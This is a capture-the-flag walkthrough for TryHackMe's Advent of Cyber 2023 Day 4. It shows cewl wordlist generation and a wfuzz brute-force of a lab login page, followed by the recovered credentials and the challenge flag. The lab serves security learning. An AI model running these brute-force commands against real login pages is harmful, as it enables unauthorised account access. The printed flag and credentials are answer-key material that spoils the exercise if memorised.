# Advent Of Cyber 2023 Day-4

1. First, I started the machine of the task of day 4.
    
2. Then in order to use AntarctiCrafts homepage to generate a wordlist that could potentially hold the key to the portal, I used this command:
    
    <mark>cewl -d 2 -m 5 -w passwords.txt </mark> [<mark>http://MACHINE_IP</mark>](http://MACHINE_IP) <mark> --with-numbers</mark>
    

![](https://lh7-us.googleusercontent.com/wBcy3ozajJpUJaeLt6_6Vvgfu3x-iF-_TvG4xx3-aG9M_Q1LcAIXq5NKYdqqFhj3pq7Rj6XD_2OC48EJvA_QUfC5kpxZdGM2HGJRs3PCD7j1nPOgZVyVCdUs_-TwmfSOeSj4OeyIhWa9rkOk5oygVQ align="left")

1. Then to narrow down the search as the page of teams might contain the desired information, I used this command:
    
    <mark>cewl -d 0 -m 5 -w usernames.txt </mark> [<mark>http://MACHINE_IP/team.php</mark>](http://MACHINE_IP/team.php) <mark> --lowercase</mark>
    
2. Then to check the size of the files, I used <mark>ls -al</mark> command.
    

![](https://lh7-us.googleusercontent.com/Rpu0BhhQlqU-AedpzaMow6lC2qWskhzKUoL6THUcCBWCOdLMb6r1b_kHdXG-CcK7yTS8sp4k1lKIeWeonESEdMfH_ZfeqSO-6C0b83fV-cfF_UWRDeVAY0ZUitDnL4RLZg9XjB_s_S8sVf_YKe7zag align="left")

1. Next, I used the command <mark>head passwords.txt</mark> to see the top part of the password list.
    

![](https://lh7-us.googleusercontent.com/DmQzPCBlCg7qcHD7KrKcZZzkjO6SaQgGE1t-j-tZoASlaBEftdlyJR2CbWA5g1u4q5xrXFQyhAoHamvmeIkoTPcvHE0TvLqPGy7_pMlFmP8_Fd8zsbT65CpzBZ59ZphcXzjZRi6Da57oEmXiB6ftJA align="left")

1. Then I used the given address to open the login page where it was requiring credentials.
    

![](https://lh7-us.googleusercontent.com/V87V_Oe88rOYvbHdbZkHArApjwRoEjkmAFiZ0M5sytLRXd9bogFhpFiAt0tWfKLPRKB9yvd5AiHXgSgjg3WClY648JuC5vT5lIBEb1L01s3dMpSE37Vp9czW9vj5iyMjMNQ928-ZlkiTBN1tM6A7tg align="left")

1. Since Wfuzz is a tool designed for brute-forcing web applications, I used this command:
    
    <mark>wfuzz -c -z file,usernames.txt -z file,passwords.txt --hs "Please enter the correct credentials" -u </mark> [<mark>http://MACHINE_IP/login.php</mark>](http://MACHINE_IP/login.php) <mark> -d "username=FUZZ&amp;password=FUZ2Z"</mark>
    

![](https://lh7-us.googleusercontent.com/rvINTjXGxdrim35j9ClVpEYb1Wf3lItpYIHeO4NM-NcT8bzcCjtlgKsrldd9NZdG6noYNo5hN7VSrlZL-emoNbStJZrUU5eGtnG4R6a7nFtVfb1eB1RYMNJXYS4Yuzl0W_CcmZSwisv27HNkLgxmWg align="left")

Using this command led to finding the username and password

Which were:

<mark>Username: isaias</mark>

<mark>Password: Happiness</mark>

1. I used these credentials to log into that page and obtained the flag.
    

![](https://lh7-us.googleusercontent.com/vX8h3HqZXBEYUUmk0nra7_aqApnOIqaGNa0oveJkHU34uU4MiZb0Q-nafRvpVnNGMPvmiTaaS8L4uYJfbJttaQ05gqVkxeuEm4X76e9vPUKsI1ym22JTX0Ih_geiz5-AICsM5AD46I5Gjub_KKa4xg align="left")

Finally, I found the flag!

<mark>Flag: THM{m3rrY4nt4rct1crAft$}</mark>
